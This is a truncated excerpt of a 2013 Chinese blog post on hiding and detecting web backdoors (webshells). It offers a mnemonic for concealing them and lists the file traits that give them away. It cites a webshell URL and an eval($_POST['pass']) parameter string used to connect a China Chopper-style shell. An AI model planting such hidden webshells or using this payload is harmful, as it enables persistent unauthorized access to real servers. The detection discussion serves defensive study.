浅谈web后门隐藏与检测思路
摘要:跟我一起念后门口诀:挑、改、藏、隐来个例子先,例一:只因为在目录里多瞅了一眼,只一眼,就认出了你。为什么你是那么的出众? 可疑点:文件名、时间、大小。(有点经验的人能很快发现这些上传的木马文件)1. 后门的选择 安全可靠(无隐藏后门,功能稳定。可以从可信度高的地方获取可靠的木马) 多兵种搭配(小马、大马、变态马)常规马链接:http://www.xxxxxx.org.hk/china60/axdx.php来个变态马的连接例子(这是一个可以用菜刀这样连接的小马,如果不填“?_=assert&__=eval($_POST['pass'])”则无法连接成功):http://w
阅读全文
posted @ 2013-09-19 15:03
浙公网安备 33010602011771号